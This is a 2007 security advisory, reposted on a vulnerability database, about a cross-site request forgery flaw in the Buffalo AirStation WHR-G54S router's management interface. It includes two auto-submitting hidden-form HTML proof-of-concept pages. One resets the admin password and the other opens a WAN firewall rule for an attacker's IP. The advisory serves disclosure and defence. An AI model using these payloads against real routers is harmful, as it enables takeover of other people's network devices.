Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17952
HistorySep 08, 2007 - 12:00 a.m.

Buffalo AirStation WHR-G54S CSRF vulnerability

2007-09-0800:00:00
vulners.com
20
JSON

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Louhi Networks Oy
-= Security Advisory =-

Advisory: Buffalo AirStation WHR-G54S Web Management CSRF
vulnerability
Release Date: 2007-09-07
Last Modified: 2007-09-07
Authors: Henri Lindberg, Associate of (ISC)²
[henri d0t lindberg at louhi d0t fi]

Application: Buffalo AirStation Web Management

Devices: WHR-G54S Ver.1.20, possibly other Buffalo products
Severity: Cross site request forgery in management interface
Risk: Moderate
Vendor Status: No response from vendor.
References: http://www.louhi.fi/advisory/buffalo_070907.txt

Overview:

During cursory inspection of WHR-G54S it was discovered that a cross
site request forgery vulnerability exists in the management
interface. Thus, it is possible for an attacker to perform any
administrative action in the management interface. These include
e.g. changing administrative password or adding new firewall rules.

Details:

Buffalo AirStation WHR-G54S Ver.1.20 device management interface
does not validate the origin of an HTTP request. If attacker is able
to make user visit a hostile web page, a device can be controlled
by submitting suitable forms. It is possible to add new users for
example.

Successful attack requires that the attacker knows the management
interface address for the target device. As authentication is done
using HTTP Basic authentication, exploiting this vulnerability
requires more effort compared to forms authentication.

Proof of Concept:

<html>
<body onload="document.CSRF.submit()">
<form name="CSRF" method="post"
action="http://192.168.11.1/cgi-bin/cgi?req=inp&amp;res=ap.html
"style="display:none">

<input name="ap" value="Evil">
<input name="TEST_INPUT" value="1">
<input name="edit_ropass" value="evil">
<input name="edit_ropass2" value="evil">
<input name="ropass" value="live">
<input name="gupass" value="">
</form>
</body>
</html>

Note: ropass value is reversed edit_ropass value.

<html>
<body onload="document.CSRF.submit()">
<form name="CSRF" method="post"
action="http://192.168.11.1/cgi-bin/cgi?req=inp&amp;res=filter_ip.html&quot;
style="display:none">

<input name="sela" value="ACCEPT">
<input name="sel_direction" value="WAN">
<input name="H_sour_ip" value="1.1.1.1">
<input name="H_dest_ip" value="">
<input name="H_prt" value="all">
<input name="Do_ADDtop" value="Add%A0%28Head%29">

</form>
</body>
</html>

1.1.1.1 = attacker's IP address

Workaround:

Do not browse untrusted websites while using the management
interface.

Log out after administering the device.

More information

http://en.wikipedia.org/wiki/Cross-site_request_forgery

Disclosure Timeline:

XX July 2007 - Discovered the issue
15. August 2007 - Contacted Buffalo
17. August 2007 - Contacted Buffalo again.
7. September 2007 - No response from Vendor.
7. September 2007 - Advisory released

Copyright 2007 Louhi Networks Oy. All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (MingW32)

iEYEAREIAAYFAkbhNJIACgkQ3TZNEGeZkm50SACcCHiOtcfCycfYcxr3lsQPh/J3
Aa8AoKVr6BmKMamG3a7mQCAvO0FV+6y6
=+E8f
-----END PGP SIGNATURE-----

JSON